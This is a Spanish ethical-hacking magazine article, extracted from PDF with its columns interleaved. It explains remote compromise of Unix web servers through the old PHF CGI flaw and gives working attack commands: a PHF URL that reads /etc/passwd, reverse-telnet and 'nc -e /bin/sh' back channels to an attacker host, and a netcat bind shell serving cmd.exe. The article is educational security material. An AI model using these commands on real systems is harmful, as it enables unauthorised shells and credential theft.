En la parte 1 sobre acceso remoto,detal- Normalmente el acceso como root se que como vimos en la parte 1 nos
lamos los pasos que sigue un hacker logra en varios pasos: permite inyectar comandos. Por
para comprometer un sistema Unix. 1.Mediante el exploit de una vulner- ejemplo, pedirle que nos abra una
En particular,cómo a través de una vul- abilidad realizamos un acceso via la consola de comandos (X-Windows).
nerabilidad es posible lograr el acceso red (acceso remoto) y logramos la ¿Pero que sucede si "xterm" está desha-
remoto a un sistema.Realizamos una e- posibilidad de ejecutar comandos en bilitada en la máquina víctima?.
jemplificación basada en la vulnerabili- el sistema remoto víctima.Muy prob- Otra opción es crear lo que se llama un
dad conocida como PHF de CGI y vimos ablemente, no tendremos privilegios "back channel": la comunicación se
como era posible librar comandos sobre de root. origina en la máquina víctima (en este
un servidor web víctima. Si "xterm" (el 2. Ya con acceso local (una shell a caso el web-server) y no en la máquina
cliente para obtener una X-Windows) nuestra disposición) escalaremos atacante. Veremos dos variante:
existía en la víctima, mostramos como privilegios hasta root (Paso 8, Ethical "reverse telnet" y uso de netcat en
el servidor web nos podía proveer de Hacking: Hacking Unix, NEX IT lugar de telnet.
una ventana para ejecutar comandos. Specialist #16,Mayo 2005).
En lo que sigue,y nuevamente usando 3. Con privilegios de root devastare- ReverseTelnet
el mismo exploit basado en la vulner- mos el sistema y la red completa. En la mayoría de los sistemas Unix exis-
abilidad PHF, veremos una segunda En este artículo detallaremos una tirá un cliente telnet. Suponemos en-
técnica (muy popular) llamada técnica muy popular (de lo que es el tonces que esto es así en nuestro web-
"reverse telnet" (telnet inverso).Netcat punto 1.más arriba) de acceso remoto server víctima. Ejecutaremos telnet en
(la llamada navaja suiza de la seguri- llamada "crear un back channel" y en nuestra máquina víctima pero nece-
dad informática), será usada como particular "reverse telnet". sitaremos de netcat (nc) de modo de
parte de esta técnica. habilitar a los "nc listeners" (escuchado-
La vulnerabilidad PHF es muy antigua Resumendelproblema ras nc) en nuestro sistema de modo de
en el mundo Unix y es poco probable aceptar la conexión "reverse telnet".
que aparezca en servidores en produc- En una red como la de la figura,trataré
ción en estos días.La idea es aprender desde una máquina que accede a inter- ¿Quépasos
la metodología, y para esto PHF nos net,lograr comprometer el web-server debemosseguir?
sirve muy bien. del segmento DMZ. Como vemos
existe un firewall que supondremos 1. Ejecutaremos nc en nuestro
Introducción sólo permite acceder (entrada) a los sistema en dos ventanas separadas
puertos 80,25,20 y 21 (al web-server,el de modo de recibir las conexiones
El mayor logro buscado por un hacker al mail server y ftp server respectiva- "reverse telnet".
comprometer un sistema Unix, será mente) y salida por 80 y 443. #nc -l -n -v -p 80
acceder a un shell de comando como Partimos del supuesto que existe una listening on [any] 80
usuario "root".Root es el todopoderoso vulnerabilidad en el servidor web. Por #nc -l -n -v -p 25
de un Sistema Operativo (SO) Unix. ejemplo la famosa PHF (un script CGI) listening on [any] 25
/bin/telnet IP_de_maquina_atacante 80
| /bin/sh | /bin/telnet
IP_de_maquina_atacante 25
/cgi-bin/phf?Qalias=x%0a/bin/
telnet%20IP_de_maquina_atacante
%2080%20|%20/bin/sh%20|%20/bin/telnet%2
0IP_de_maquina_atacante%2025
TELNET
¿Quéhaceestecomando?
Telnet es el nombre de un proto-
/bin/telnet IP_de_maquina_atacante 80 colo (y del programa informático
que implementa el cliente) que
Básicamente conecta (a la máquina víctima) vía el permite acceder mediante una red
a otra máquina, para manejarla
puerto 80 a los nc listeners en puerto 80,activados como si estuviéramos sentados
en nuestra máquina atacante LA VULNERABILIDAD delante de ella. Para que la conex-
Es aquí donde tipeamos nuestros comandos que DE PHF ión funcione, como en todos los
son pasados (piped) a /bin/sh (una Shell Bourne). servicios de internet, la máquina a
Los resultados de esos comandos son pasados PHF es un típico ejemplo de los lla- la que se accedía debe tener un
("piped") a bin/telnet IP_de_maquina_atacante mados "Ataques de Validación de programa especial que reciba y
25. El resultado es un "reverse telnet" que sucede Input" (Input Validation Attacks). gestione las conexiones.
Fue una tristemente famosa vulner-
en dos ventanas separadas.
abilidad reportada por J. Myers en Sólo sirve para acceder en modo
Aquí usamos los puertos 80 y 25 ya que estos son 1996. PHF era un Script de CGI, muy terminal, es decir, sin gráficos, pero
los que el firewall permite salir.Pero de ser permi- divulgado y que venía estándar en fue una herramienta muy útil para
tido por el firewall,cualquier puerto serviría. Apache y NCSA HTTPD. arreglar fallos a distancia, sin
El script básicamente aceptaba el necesidad de estar físicamente en
Unavariantea"reversetelnet" carácter (%2a) (nueva línea) y eje- el mismo sitio que la máquina que
cutaba cualquier comando que los tenía. También se usaba para
Es posible realizar una variante al esquema anteri-
siguiese con los privilegios de UID consultar datos a distancia, como
que corriese el servidor Web. datos personales en máquinas ac-
or usando netcat (nc) en la máquina víctima.
cesibles por red, información bibli-
Netcat es muy popular en sistemas Unix y muy El exploit original era: ográfica, etc.
probablemente esté activo.Del mismo modo que
"reverse telnet" este "back channel" es un proceso /cgi-bin/phf?Qalias=x%0a/bin/ Su mayor problema es de seguri-
de dos pasos: cat%20/etc/password dad, ya que todos los nombres de
usuario y contraseñas necesarias
1.habilitar un listener (escucha) dentro de la La línea anterior logra hacer cat del para entrar en las máquinas viaja-
máquina atacante: archivo de passwords (cat es un ban por la red sin cifrar (en ``texto
#nc -l -n -v -p 80 comando UNIX que concatena claro). Esto permite que cualquiera
2.Ejecutar en la máquina víctima,por ejemplo, vía
archivos). Es decir lograba darme que espíe el tráfico de la red pueda
los UID y las passwords encriptadas obtener los nombres de usuario y
el exploit PHF (asumimos que los archivos de
#nc -e /bin/sh IP_de_maquina_atacante 80
contraseñas, y así acceder él
passwords no están "shadowed"). también a todas esas máquinas.
Usado de este modo un hacker con Dejó de usarse casi totalmente
Cuando se ejecute este comando en el web- poca experiencia se hubiese dedi- hace unos años, cuando apareció y
server, se creará un "back channel" nc, otorgán- cado posteriormente a crackear el se popularizó el SSH, que puede
dole un shell (/bin/sh) a nuestro atacante. archivo de passwords y logonearse describirse como una versión
al sistema vulnerable. cifrada de telnet.
LA NAVAJA SUIZA
(Si desea conocer más sobre netcat, lea el artícu-
lo de Leonel Becchio en NEX IT Specialist #14,pag
73, Marzo 2005).
E
s muy acertado denominar de tal archivos. Asimismo Netcat se utiliza para -l (fuerza a netcat a escuchar a conex-
manera a Netcat, dada la amplia can- concatenar sockets TCP y UDP. Si desea iones entrantes)
tidad de tareas que permite que sean conocer la historia de Netcat y sus autores -n (fuerza a netcat a aceptar direcciones
hechas. Netcat es la segunda her- Hobbit y Weld Pond, recomendamos leer IP numéricas y no realizar lookups DNS)
ramienta más popular utilizada en el mundo el artículo "cDc (Cult of the Dead Cow), -v (controla el nivel de verbosidad (can-
de la seguridad informática. Con ella puede The L0pht y Netcat" publicado en NEX It tidad de info que da)
reemplazarse a una suite de herramientas. Specialist #14, Marzo 2005. -p xxx (fuerza a netcat a usar el puerto
Netcat es un cliente telnet, básicamente La utilidad fue desarrollada para ser tra- xxx para conexiones salientes. El
su función primordial es la lecto-escritura bajada desde una consola por línea de co- parámetro puede ser numérico o un
de datos a través de conexiones TCP o mandos invocando el comando nc . Sería nombre listado en el archivo de servicios.
UDP. Por tal motivo, como puede ser es- demasiado extenso mencionar todos los Si -p no es usado, netcat se ligará a
pecificado el puerto de trabajo, Netcat parámetros disponibles para usar con cualquier puerto no usado que le de el
puede ser usado como scanner de Netcat. Pero veamos los utilizados en sistema, a menos que usemos la opción -r.
puertos, redirector de puertos, puerta de nuestro artículo: -e (ejecuta un programa)
acceso trasero (backdoor) y otras tantas
cosas. Tal vez no sea la mejor herramienta
o la más cómoda para trabajar, pero esta Obtener una consola de comandos de un servidor
utilidad brinda lo necesario para suplir los
requerimientos de una completa tarea de
hacking por sí sola. La ventaja es que El siguiente ejemplo será muy instructivo. con la misma línea de comando que cuando
Netcat puede trabajar como cliente y Intente realizarlo, de modo de entender el terminó la conexión.
servidor. Debemos aclarar que como todo poder de netcat. En el sistema cliente (desde el cuál nos
cliente telnet, cada cosa que tipeemos, conectaremos al servidor) tipee:
primero viaja hacia la consola remota y si En el servidor corriendo Windows y con
es que existe un puerto a la escucha, netcat instalado tipee lo siguiente en una nc IP_destino 1234
vuelve y es mostrada en la consola local. consola de comandos:
Por tal motivo deberemos colocar dos Este comando hace que netcat se conecte al
consolas corriendo Netcat, una local y una nc -l -p 1234 -d -e cmd.exe -L servidor cuyo IP es IP_destino, sobre el
funcionará como remota. puerto 1234. Nos aparecerá una consola
Netcat proviene de la época de los sis- -l pone a netcat en modo escucha, -p 1234 pero los comandos que allí topeemos se eje-
temas operativos Unix, de hecho fue que use el puerto 1234, -d permite correr a cutarán sobre el servidor. Para salir, tipee
lanzado primeramente para aquellos sis- netcat "detached" (separado) de la consola, "exit". Esto nos retornará a la consola origi-
temas y posteriormente apareció la el -e cmd.exe le indica a netcat que ejecute nal. Podremos reconectarnos en cualquier
versión para el entorno Windows NT. Su el programa cmd.exe cuando realiza una momento ya que comenzamos netcat en el
nombre es una derivación del comando conexión, y el -L hará un restart de netcat servidor con la opción -L.
Unix cat que se utiliza para concatenar